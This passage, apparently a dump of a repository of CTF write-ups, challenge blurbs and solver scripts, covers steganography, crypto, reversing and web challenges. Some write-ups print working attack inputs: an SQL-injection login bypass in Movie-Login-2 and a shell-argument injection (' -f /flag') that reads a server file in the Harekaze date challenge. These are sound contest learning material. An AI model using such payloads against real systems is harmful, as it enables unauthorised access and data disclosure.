retake for\n a maximum final test grade of 50%.\n4. Parent notification; required parent conference with an administrator, or\n designee, to determine what further action, if any, should be taken.\n5. A recording of the incident is made by the building supervisor.\n\n2nd Offense:\n1. A grade of “0” will be given for the assignment or test\n2. No make-up option;\n3. Parent notification; required parent conference with an administrator, or\n designee, to determine what further action, if any, should be taken.\n4. A formal recording of the incident is placed in the student’s folder.\n5. A one-day out-of-school suspension is assigned.\n\n3rd Offense:\n1. Loss of course credit\n2. Required parent conference with an administrator, or designee\n3. Up to three-day suspension\n4. Recommendation for alternative placement\n\nPlagiarism and cheating are serious offenses and the Board expects all students\nto be honest in the presentation and submission of their assignments, homework,\ntest answers and any other academic works as the product of their own\nintellectual efforts. Any student who copies verbatim or paraphrases another’s\nwords or ideas or who allows one’s own words or ideas to be copied verbatim or\nparaphrased shall be guilty of plagiarism. A student who shares his own words or\nideas with another or presents another’s words or ideas and attributes them as\nhis own is also guilty of plagiarism.\n\nCheating is acting dishonestly or unfairly in order to gain an advantage. Acts\nof cheating may include the submission of work prepared by another but passing\nit off as one’s own or copying the work or answers of another. It is also an act\nor instance of sharing or allowing to be shared one’s own works, words, answers\nor ideas with others. 
For more information see Board Policy 5701.\n\nThe above is copied from\nhttps://www.bergen.org/cms/lib/NJ02213295/Centricity/Domain/9/studentHandbook2020_2021-rev-9-24.pdf\nSee, I cited my sources, so I'm obviously not plagiarising.\n\nalso let me add that that's a pretty ugly url\n\nalso also have the flag!\nbcactf{now_i_know_my_A_B_Cs!!_next_time_wont_you_cheat_with_me??}\n\nAlright, class dismissed!\n```\n\n<!-- bcactf{now_i_know_my_A_B_Cs!!_next_time_wont_you_cheat_with_me??} -->\n" }, { "alpha_fraction": 0.6577380895614624, "alphanum_fraction": 0.7529761791229248, "avg_line_length": 31.80487823486328, "blob_id": "86ad5e8b4cbad4f76061865b1e08ab75e3749f3c", "content_id": "fb36c187da54f031b317a0c1eb5795859d917609", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1664, "license_type": "no_license", "max_line_length": 762, "num_lines": 41, "path": "/2020/WaniCTF/chunk_eater/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`file`コマンドを使ってファイル形式を調べる。\n\n```bash\n$ file eaten.png \neaten.png: data\n```\n\nどうやらただのPNGファイルではなさそう。イメージとしても開けない。\n\n`srtings`コマンドを使ってみると、`WANI`という単語が出現する。\n\n```bash\n$ strings eaten.png | head -n 10\nWANI\nsRGB\ngAMA\n\tpHYs\ntEXtSoftware\nAdobe ImageReadyq\n$iTXtXML:com.adobe.xmp\n<?xpacket begin=\"\n\" id=\"W5M0MpCehiHzreSzNTczkc9d\"?> <x:xmpmeta xmlns:x=\"adobe:ns:meta/\" x:xmptk=\"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 \"> <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> <rdf:Description rdf:about=\"\" xmlns:xmp=\"http://ns.adobe.com/xap/1.0/\" xmlns:xmpMM=\"http://ns.adobe.com/xap/1.0/mm/\" xmlns:stRef=\"http://ns.adobe.com/xap/1.0/sType/ResourceRef#\" xmp:CreatorTool=\"Adobe Photoshop CS6 (Macintosh)\" xmpMM:InstanceID=\"xmp.iid:A12986FEBD5C11E3A38AFE01A4935390\" xmpMM:DocumentID=\"xmp.did:A12986FFBD5C11E3A38AFE01A4935390\"> <xmpMM:DerivedFrom stRef:instanceID=\"xmp.iid:A12986FCBD5C11E3A38AFE01A4935390\" stRef:documentID=\"xmp.did:A12986FDBD5C11E3A38AFE01A4935390\"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end=\"r\"?>\nPWANIx^\n\n$ strings eaten.png | grep WANI\nWANI\nPWANIx^\nWANI\nWANI\nWANI\n```\n\n最初のWANIをIHDR, 最後のWANIをIEND, それ以外のWANIをIDATにするとPNGとして画像を見ることができる。\n\n* [PNGファイルフォーマット](https://www.setsuki.com/hsp/ext/png.htm)\n\nバイナリの書き換えには`青い空を見上げればいつもそこに白い猫 for うさみみハリケーン`を使用した。\n\n<!-- FLAG{chunk_is_so_yummy!} -->" }, { "alpha_fraction": 0.3140425384044647, "alphanum_fraction": 0.3787234127521515, "avg_line_length": 42.51852035522461, "blob_id": "65cae22aa5b2c170961d0dcad65b73027817de62", "content_id": "d7ab59feff68c18cd0d2e1388863568b2c12f17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1177, "license_type": "no_license", "max_line_length": 111, "num_lines": 27, "path": "/2021/DawgCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# DawgCTF 2021\n\n* https://umbccd.io/\n\n* 2021/05/08 07:00 JST — 2021/05/09 07:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------------------------------ | --------------- | ----: | -----: |\n| Reversing | [Calculator](Calculator) | exe | 50 | 140 |\n| Crypto | [cookin the ramen](cookin_the_ramen) | CyberChef | 50 | 242 |\n| Crypto | [It's Not RSA!](Its_Not_RSA) | Enigma | 100 | 33 |\n| Crypto | [Really Secure Algorithm](Really_Secure_Algorithm) | Wiener's Attack | 150 | 157 
|\n| Reversing | [Secret App](Secret_App) | exe | 50 | 142 |\n| Crypto | [The Obligatory RSA Challenge](The_Obligatory_RSA_Challenge) | RSA, n=q^2 | 200 | 146 |\n| Crypto | [TrashChain](TrashChain) | | 250 | 74 |\n\n---\n\n## Result\n\n* 855 points\n\n* 191 / 595 (> 1 pt)\n" }, { "alpha_fraction": 0.3734392821788788, "alphanum_fraction": 0.42678773403167725, "avg_line_length": 24.171428680419922, "blob_id": "38a05f4415f12f74763f2da60a8ff1d624e281d6", "content_id": "c2d0745ca6881194eb8921f586d682c40de812fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1635, "license_type": "no_license", "max_line_length": 287, "num_lines": 35, "path": "/2021/BCACTF_2.0/More_than_Meets_the_Eye/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\nPretty empty over here​‌‌​​​‌​​‌‌​​​‌‌​‌‌​​​​‌​‌‌​​​‌‌​‌‌‌​‌​​​‌‌​​‌‌​​‌‌‌‌​‌‌​‌‌‌‌​‌​​​‌‌​​‌‌​‌‌‌​​‌​​​‌‌​​​​​‌​‌‌‌‌‌​‌‌‌​‌‌‌​​‌‌​​​‌​‌‌​​‌​​​‌‌‌​‌​​​‌‌​‌​​​​‌​‌‌‌‌‌​‌‌​‌​‌​​‌‌‌​‌​‌​‌‌​‌‌‌​​‌‌​​‌‌‌​‌‌​‌‌​​​​‌‌​​‌‌​‌​‌‌‌‌‌​‌‌​‌​‌​​​‌‌‌​​​​​‌‌​​‌​​‌‌​​​​‌​‌‌‌‌​​​​‌​​‌​​​​​‌‌​‌​​​‌‌‌‌‌​‌.\n```\n\nバイナリエディタで見ると、何か書かれていることが分かる。\n\n![](img/2021-06-12-21-54-04.png)\n\nZWSPで検索すると、**`ゼロ幅スペース`**の意味であることが分かった。\n\n* https://ja.wikipedia.org/wiki/ゼロ幅スペース\n\nこのテキストには `U+200B = E2808B` と `U+200C = E2808C` のみが含まれているので、これを`0,1`に変換して文字列にする。\n\n```py\nfrom Crypto.Util.number import *\n\ntext = open('zwsp.txt','rb').read()\n\nbinary = ''\nfor i,t in enumerate(text):\n if(t == 0xe2):\n if(text[i:i+3] == b'\\xe2\\x80\\x8b'):\n binary += '0'\n else:\n binary += '1'\n\nprint(long_to_bytes(int(binary,2)))\n```\n\n<!-- bcactf{z3r0_w1dth_jungl3_j82axH4} -->\n" }, { "alpha_fraction": 0.703125, "alphanum_fraction": 0.7708333134651184, "avg_line_length": 20.44444465637207, "blob_id": "1f99df7c526d13c296f01f2771eee3b12dd5f20c", "content_id": "14b2c18f12f27495211283c06ca804633b672c24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 206, "license_type": "no_license", "max_line_length": 129, "num_lines": 9, "path": "/2021/WaniCTF21-spring/Cant_restore_the_flag/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "ちりつもですよ\n\n```\nnc crt.cry.wanictf.org 50000\n```\n\n[cry-cant-restore-the-flag.zip](https://score.wanictf.org/storage/bzmve5uv6ynmrs13h0wqx0p1helwb6bl/cry-cant-restore-the-flag.zip)\n\nWriter : Laika" }, { "alpha_fraction": 0.6544715166091919, "alphanum_fraction": 0.7642276287078857, "avg_line_length": 34.14285659790039, "blob_id": "a1527766eb20d4e4ca1784a2386225df1896e20e", "content_id": "ed249770a94f350c13e7e2aba798aa344978da41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 125, "num_lines": 7, "path": "/2021/dCTF_2021/Just_Take_Your_Time/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Let's go. In and out. 
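An encoder counterpart to the zero-width decoder in the More_than_Meets_the_Eye write-up above, as a sketch: U+200B stands for 0 and U+200C for 1, eight bits per byte, so a short message vanishes into otherwise ordinary text.

```python
# Hide bytes as zero-width characters (the reverse of the write-up's decoder).
ZW = {'0': '\u200b', '1': '\u200c'}

def hide(msg: bytes) -> str:
    bits = ''.join(f'{b:08b}' for b in msg)
    return ''.join(ZW[bit] for bit in bits)

stego = 'Pretty empty over here' + hide(b'hi') + '.'
print(len(stego))   # 39: 23 visible characters plus 16 zero-width ones
```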
2 second adventure.\n\n```\nnc dctf-chall-just-take-your-time.westeurope.azurecontainer.io 9999\n```\n\n[just-take-your-time.py](https://dctf.dragonsec.si/files/c357be91113fd46c23f6c77b335f9366/just-take-your-time.py?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTUxfQ.YKDNkA.4Rpai0RUifp7XfN5fphD4TTmH2U)\n" }, { "alpha_fraction": 0.5114942789077759, "alphanum_fraction": 0.6091954112052917, "avg_line_length": 12.384614944458008, "blob_id": "f667dfe9a2c1b186cf63cf9a8853c613878717b0", "content_id": "55dd9f813fe80187f1c057804d276766a9ba469a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 548, "license_type": "no_license", "max_line_length": 56, "num_lines": 26, "path": "/2021/BCACTF_2.0/Movie-Login-2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49153/ にアクセスする。\n\n`Movie-Login-1`と同様にログイン画面が表示される。\n\n![](img/2021-06-13-14-52-33.png)\n\n問題に添付されているjsonファイルは以下のようになっており、ここに書かれている文字は使えないようになっている。\n\n```json\n[\n \"1\",\n \"0\",\n \"/\",\n \"=\"\n]\n```\n\n`username = admin`, パスワードを以下のようにしたらログインできた。\n\n```\n2' or '3' > '2\n```\n\n<!-- bcactf{h0w_d1d_y0u_g3t_h3r3_th1s_t1m3?!?} -->\n" }, { "alpha_fraction": 0.7231404781341553, "alphanum_fraction": 0.7644628286361694, "avg_line_length": 33.57143020629883, "blob_id": "83b7ff46f92a48627b8bf49da11859795c07bb2b", "content_id": "8d18457b5fcb02d921cfc0caa1c0d84d5cbf9b6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 242, "license_type": "no_license", "max_line_length": 154, "num_lines": 7, "path": "/2021/BCACTF_2.0/Countdown_Timer/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Get the flag once the countdown timer reaches zero! 
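The Movie-Login-2 write-up above slips past a denylist of `1`, `0`, `/` and `=` by comparing strings with `>` instead. The challenge's real backend isn't shown here, so this sketch uses sqlite3 as a stand-in to show why the payload always matches:

```python
# '3' > '2' is a true string comparison and uses none of the denylisted
# characters, so the OR branch admits any username.
import sqlite3

db = sqlite3.connect(':memory:')
db.execute("CREATE TABLE users (name TEXT, pw TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

payload = "2' or '3' > '2"
rows = db.execute(
    f"SELECT * FROM users WHERE name = 'admin' AND pw = '{payload}'"
).fetchall()
print(rows)   # [('admin', 's3cret')] despite the wrong password
```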
However, the minimum time you can set for the countdown is 100 days, so you might be here for a while.\n\nhttp://web.bcactf.com:49154/\n\nHint 1 of 1\n\nCan you manipulate a website's JavaScript?\n" }, { "alpha_fraction": 0.6775510311126709, "alphanum_fraction": 0.686734676361084, "avg_line_length": 22.33333396911621, "blob_id": "2627536773e0300249a77b884120b75028e538da", "content_id": "3106e1a63b1373946d5fd56489722e77135c0444", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 980, "license_type": "no_license", "max_line_length": 51, "num_lines": 42, "path": "/2020/CyberSecurityRumble2020/Zeh/haupt.c", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include \"fahne.h\"\n\n#define Hauptroutine main\n#define nichts void\n#define Ganzzahl int\n#define schleife(n) for (Ganzzahl i = n; i--;)\n#define bitrverschieb(n, m) (n) >> (m)\n#define diskreteAddition(n, m) (n) ^ (m)\n#define wenn if\n#define ansonsten else\n#define Zeichen char\n#define Zeiger *\n#define Referenz &\n#define Ausgabe(s) puts(s)\n#define FormatAusgabe printf\n#define FormatEingabe scanf\n#define Zufall rand()\n#define istgleich =\n#define gleichbedeutend ==\n\nnichts Hauptroutine(nichts) {\n Ganzzahl i istgleich Zufall;\n Ganzzahl k istgleich 13;\n Ganzzahl e;\n Ganzzahl Zeiger p istgleich Referenz i;\n\n FormatAusgabe(\"%d\\n\", i);\n fflush(stdout);\n FormatEingabe(\"%d %d\", Referenz k, Referenz e);\n\n schleife(7)\n k istgleich bitrverschieb(Zeiger p, k % 3);\n\n k istgleich diskreteAddition(k, e);\n\n wenn(k gleichbedeutend 53225)\n Ausgabe(Fahne);\n ansonsten\n Ausgabe(\"War wohl nichts!\");\n}\n" }, { "alpha_fraction": 0.6995940208435059, "alphanum_fraction": 0.736129879951477, "avg_line_length": 35.95000076293945, "blob_id": "1b9704d236b5de64497c2eb3cece37b8e12dc0d7", "content_id": "3e07b4d6bb126eeec87062f3961fd8ef2b9af50e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 739, "license_type": "no_license", "max_line_length": 100, "num_lines": 20, "path": "/2021/WaniCTF21-spring/licence/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import angr\n\nbin_path = './rev-licence/licence'\nlicence_path = './rev-licence/key.dat'\n\nproject = angr.Project(bin_path, load_options={\"auto_load_libs\": False})\nmain_addr = project.loader.main_object.get_symbol('main').rebased_addr\nstate = project.factory.entry_state(args=[project.filename, licence_path])\ninput_file = angr.storage.SimFile(licence_path)\nstate.posix.fs = {licence_path: input_file}\n\nsim = project.factory.simulation_manager(state)\n# address from IDA\naddr_fail = [main_addr + (0x5D88-0x5CB0) , main_addr + (0x5DE1-0x5CB0), main_addr + (0x5E44-0x5CB0)]\naddr_success = main_addr + (0x5E66-0x5CB0)\n\nsim.explore(find=addr_success,avoid=addr_fail)\n\nif sim.found:\n print(repr(sim.one_found.fs.get(licence_path).concretize()))\n" }, { "alpha_fraction": 0.6964285969734192, "alphanum_fraction": 0.7827380895614624, "avg_line_length": 66.19999694824219, "blob_id": "36cf5a2dd5955d85267866d06abd3a4f6bf0b003", "content_id": "5dfa359096fbb06de4ae890fc9096ac1ef8551fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 336, "license_type": "no_license", "max_line_length": 209, "num_lines": 5, "path": "/2021/UIUCTF_2021/CEO/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": 
"You just wirelessly captured the handshake of the CEO of a multi-million dollar company! Use your password cracking skills to get the password! Wrap the password in the flag format. E.g: `uiuctf{password}`\n\n**author**: Rohans885\n\n[megacorp-01.cap](https://uiuc.tf/files/d123b87f0f5bc197f73d66134874f1a4/megacorp-01.cap?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjMxfQ.YQVsRQ.-lQ3NRRba2E9Kifx1qT5-GvsstQ)\n" }, { "alpha_fraction": 0.6911764740943909, "alphanum_fraction": 0.845588207244873, "avg_line_length": 14.222222328186035, "blob_id": "f24282cd47a84054706bf46eff144b61fb45f40b", "content_id": "515eda200389149286051af659452a57a139bc1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 258, "license_type": "no_license", "max_line_length": 47, "num_lines": 9, "path": "/2020/WaniCTF/DevTools_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "開発者ツールを使うと表示を書き換えることができます。\n\n5000兆円欲しい!\n\n(5000000000000000円持っていることにするとフラグを手に入れることができます。)\n\nhttps://devtools2.wanictf.org\n\nWriter : suuhito" }, { "alpha_fraction": 0.7042253613471985, "alphanum_fraction": 0.8262910842895508, "avg_line_length": 29.285715103149414, "blob_id": "3c20aadd18b35c7d2d876f2118cb85d178b2c3f3", "content_id": "f4e73a9e365a8cc60df84333885f0fba39f1b938", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 223, "license_type": "no_license", "max_line_length": 121, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/Logical_SEESAW/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We have an innovative seesaw!\n\n[Logical_SEESAW.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/Logical_SEESAW/Logical_SEESAW.tar.gz)\n\n323d2e48e60f4ed521c88acf5d274d3c003ecdd7\n\n想定難易度: Beginner\n\n" }, { "alpha_fraction": 0.557823121547699, "alphanum_fraction": 0.6734693646430969, "avg_line_length": 15.333333015441895, "blob_id": "c6d816a533e929f3f51c65d13e3b3e821053223a", "content_id": "6290e76a49a198e0c65b3cc211d7f5e9f372dbe1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 221, "license_type": "no_license", "max_line_length": 34, "num_lines": 9, "path": "/2021/redpwnCTF_2021/inspect-me/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttps://inspect-me.mc.ax/ にアクセスする。\n\nソースコードを開発者ツールで見ると、フラグが書かれていた。\n\n![](img/2021-07-10-11-52-19.png)\n\n<!-- flag{inspect_me_like_123} -->\n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5475409626960754, "avg_line_length": 22.5, "blob_id": "b99de80609cd012f8e58bf3097ed456967517bcc", "content_id": "90bad975c5c22829a176844872adabbc04201a59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 658, "license_type": "no_license", "max_line_length": 54, "num_lines": 26, "path": "/2021/angstromCTF_2021/Follow_the_Currents/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`os.urandom(2)`さえ分かれば復号化できるので、総当たりで調べる。\n\n```py\nimport os\nimport zlib\ndef keystream(key):\n index = 0\n while 1:\n index+=1\n if index >= len(key):\n key += zlib.crc32(key).to_bytes(4,'big')\n yield key[index]\nwith open(os.path.dirname(__file__)+\"/enc\",\"rb\") as f:\n cipher = f.read()\n for n in range(256*256):\n plaintext = []\n k = keystream(n.to_bytes(2,'big'))\n for i in cipher:\n 
plaintext.append(i ^ next(k))\n if b'actf{' in bytes(plaintext) :\n print(bytes(plaintext))\n```\n\n<!-- actf{low_entropy_keystream} -->" }, { "alpha_fraction": 0.4588235318660736, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 18.615385055541992, "blob_id": "e3bfb13afa50f6f9d845d71d23ec934da149039a", "content_id": "64efac1cb13057b2909cfdd754ad83e0c85874f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 301, "license_type": "no_license", "max_line_length": 59, "num_lines": 13, "path": "/2021/BCACTF_2.0/Agent_Gerald/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49156/ にアクセスする。\n\n![](img/2021-06-13-14-42-14.png)\n\n`You're not Agent Gerald`と書かれているので、User Agent を Gerald にする。\n\n![](img/2021-06-13-14-46-36.png)\n\n![](img/2021-06-13-14-46-51.png)\n\n<!-- bcactf{y0u_h@ck3d_5tegos@urus_1nt3lligence} -->\n" }, { "alpha_fraction": 0.7478991746902466, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 70.4000015258789, "blob_id": "3a7ae4601f35fab07e644b352f584d60b88554f6", "content_id": "1d2c4c61a4e14b60ee07d92780177d9702914730", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 357, "license_type": "no_license", "max_line_length": 218, "num_lines": 5, "path": "/2021/DawgCTF_2021/Its_Not_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Our team intercepted this suspicious JSON file, but the keys don't seem quite right. We suspect this file contains critical data. Due to transmission loss, the format may need to be corrected slightly for our database.\n\nAuthor: treap_treap\n\n[intercepted_code.json](https://umbccd.io/files/a16b26a23587f82dea241f6a1927710f/intercepted_code.json?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjI4fQ.YJassg.sGrCyx9JMBxZKoQtK_YtjKXpTP4)\n" }, { "alpha_fraction": 0.7747035622596741, "alphanum_fraction": 0.8379446864128113, "avg_line_length": 27.11111068725586, "blob_id": "231b6ea05aac630001714b38ce2cc1058dd035f8", "content_id": "84dbadb20e9487b534276e6fdf1a33f93f32a836", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 431, "license_type": "no_license", "max_line_length": 97, "num_lines": 9, "path": "/2021/WaniCTF21-spring/timer/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "フラグが出てくるまで待てますか?\n\n`super_complex_flag_print_function` 関数でフラグを表示しているようですが、難読化されているため静的解析でフラグを特定するのは難しそうです...\n\nGDBを使って動的解析してみるのはいかがでしょうか?\n\n[rev-timer.zip](https://score.wanictf.org/storage/1wznoqx3t0n2bx8cz611y6vcah2v2y48/rev-timer.zip)\n\nWriter : hi120ki\n" }, { "alpha_fraction": 0.6269841194152832, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 41, "blob_id": "0f42aa9a0985e5aafbdb9a4fe8ce7946dbb44f3e", "content_id": "4f7a4d4abf69ab5b0ede4e25291e41dc8a28f138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 95, "num_lines": 3, "path": "/2021/dCTF_2021/Hidden_message/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "This image looks familiar...\n\n[fri.png](https://dctf.dragonsec.si/files/cc93248465199ed5dc9141d2fb0b9ee3/fri.png?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTY0fQ.YJ9OZA.0DjRNUYQS4c5vCPgmCOXLAELpjQ)\n" }, { "alpha_fraction": 
0.6366874575614929, "alphanum_fraction": 0.6812110543251038, "avg_line_length": 31.114286422729492, "blob_id": "ec201b072d79e70f8c3a7102fb396268578e9983", "content_id": "dd81fa86162d5827a5af5ccd54956fe869d95f62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1645, "license_type": "no_license", "max_line_length": 142, "num_lines": 35, "path": "/2020/Harekaze_mini_CTF_2020/What_time_is_it_now/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n指定のサイトにアクセスすると、現在時刻が表示される。\n\n![](img/2020-12-26-15-25-49.png)\n\nソースコードを読むと、どうやら`date`コマンドを実行して、その結果を表示しているようだ。`date`の出力フォーマットを`format`パラメータで指定している。\n\n```php\n<?php\nif (isset($_GET['source'])) {\n highlight_file(__FILE__);\n exit;\n}\n\n$format = isset($_REQUEST['format']) ? (string)$_REQUEST['format'] : '%H:%M:%S';\n$result = shell_exec(\"date '+\" . escapeshellcmd($format) . \"' 2>&1\");\n?>\n\n// (略)\n\n<h1 class=\"jumbotron-heading\"><span class=\"text-muted\">It's</span> <?= isset($result) ? $result : '?' ?><span class=\"text-muted\">.</span></h1>\n```\n\n`format`に実行したいコマンドを入れ、`date '+`.`%Y-%m-%d' ; ls '`.`'`みたいにすれば良さそうだが、`escapeshellcmd`によってほとんどの特殊文字がエスケープされてしまうので不可能。(ただし、対になっている`'`,`\"`は可能)\n\n* [PHPマニュアル:escapeshellcmd:シェルのメタ文字をエスケープする](https://php.plus-server.net/function.escapeshellcmd.html)\n\n[GTFOBins](https://gtfobins.github.io/)で`date`コマンドについて調べると、`-f`オプションでファイル読み込みができることが分かった。\n\nファイル名は決め打ちで、`format`に`' -f /flag'`を与えたところ、`date '+' -f /flag'' 2>&1`が実行され、フラグが表示された。\n\n* http://harekaze2020.317de643c0ae425482fd.japaneast.aksapp.io/what-time-is-it-now/?format=%27%20-f%20/flag%27\n\n<!-- HarekazeCTF{1t's_7pm_1n_t0ky0} -->" }, { "alpha_fraction": 0.5515463948249817, "alphanum_fraction": 0.6005154848098755, "avg_line_length": 18.450000762939453, "blob_id": "47fd9e7ef9dc57c1763a787df5a536e93c4f1232", "content_id": "3b9659153f56181ac327fcbd02445e4d959585a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 390, "license_type": "no_license", "max_line_length": 43, "num_lines": 20, "path": "/2020/WaniCTF/l0g0n/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nconn = remote('l0g0n.wanictf.org',50002)\n\ncnt = 0\nwhile True:\n cnt += 1\n # client_challenge -> server_credential\n conn.sendline('00') # any 1byte\n conn.recvuntil('>')\n # client_credential\n conn.sendline('50') # any 1byte\n conn.recvuntil('>')\n\n msg = str(conn.recvline())\n print(cnt,msg)\n if 'OK' in msg: # 1/256\n break\n\nconn.close()" }, { "alpha_fraction": 0.5188679099082947, "alphanum_fraction": 0.5377358198165894, "avg_line_length": 19.190475463867188, "blob_id": "681a35c1c1d493c0c3bcab37be1e24a111c20273", "content_id": "2f7bb6f9ef15b1af28698e28fc8f3a9cab85939b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 430, "license_type": "no_license", "max_line_length": 44, "num_lines": 21, "path": "/2021/WaniCTF21-spring/Cant_restore_the_flag/cry-cant-restore-the-flag/server.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import bytes_to_long\n\nwith open(\"flag.txt\", \"rb\") as f:\n flag = f.read()\nflag = bytes_to_long(flag)\n\nassert flag <= 10 ** 103\n\nupper_bound = 300\nwhile True:\n try:\n mod = int(input(\"Mod > \"))\n if mod > upper_bound:\n print(\"Don't cheat 🤪\")\n continue\n\n result = flag % mod\n print(result)\n except 
Exception:\n print(\"Bye 👋\")\n break\n" }, { "alpha_fraction": 0.5160028338432312, "alphanum_fraction": 0.6443812251091003, "avg_line_length": 56.408164978027344, "blob_id": "c2db16df40a060d4d7e97555ec27bf42a8db4874", "content_id": "d67cfa444db40e4388ea1b3ce4a394f8c9d9992a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3638, "license_type": "no_license", "max_line_length": 1667, "num_lines": 49, "path": "/2020/SunshineCTF/Magically_Delicious/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n```\n⭐🌈🍀 ⭐🌈🦄 ⭐🦄🌈 ⭐🎈🍀 ⭐🦄🌑 ⭐🌈🦄 ⭐🌑🍀 ⭐🦄🍀 ⭐🎈⭐ 🦄🦄 ⭐🦄🎈 ⭐🌑🍀 ⭐🌈🌑 ⭐🌑⭐ ⭐🦄🌑 🦄🦄 ⭐🌑🦄 ⭐🦄🌈 ⭐🌑🍀 ⭐🦄🎈 ⭐🌑🌑 ⭐🦄⭐ ⭐🦄🌈 ⭐🌑🎈 🦄🦄 ⭐🦄⭐ ⭐🌈🍀 🦄🦄 ⭐🌈🌑 ⭐🦄💜 ⭐🌑🦄 🦄🦄 ⭐🌑🐴 ⭐🌑🦄 ⭐🌈🍀 ⭐🌈🌑 🦄🦄 ⭐🌑🦄 ⭐🦄🌈 ⭐🌑🍀 ⭐🦄🎈 ⭐🌑🌑 ⭐🦄⭐ ⭐🦄🌈 ⭐🌑🎈 🦄🦄 ⭐🦄🦄 ⭐🌑🦄 ⭐🌈🌑 ⭐🦄💜 ⭐🦄🎈 ⭐🌑🌑 ⭐🎈🦄\n```\n\n対象の文字列を見てみると、3つ区切りで8種の文字が使われていることが分かった。\n\nということは8進数が関連していそうだと推測。\n\n試しにフラグ形式の`sun{}`を8進数に変換してみると\n\n`163 165 156 173 175` となる。\n\n* https://gchq.github.io/CyberChef/#recipe=To_Octal('Space')&input=c3Vue30\n\n絵文字と比べてみると、以下の対応があることが分かった。\n\n| number | emoji |\n| ------ | ----- |\n| 0 | |\n| 1 | ⭐ |\n| 2 | |\n| 3 | 🍀 |\n| 4 | |\n| 5 | 🦄 |\n| 6 | 🌈 |\n| 7 | 🎈 |\n\n```\n163 165 156 173 15🌑 165 1🌑3 153 171 55 157 1🌑3 16🌑 1🌑1 15🌑 55 1🌑5 156 1🌑3 157 1🌑🌑 151 156 1🌑7 55 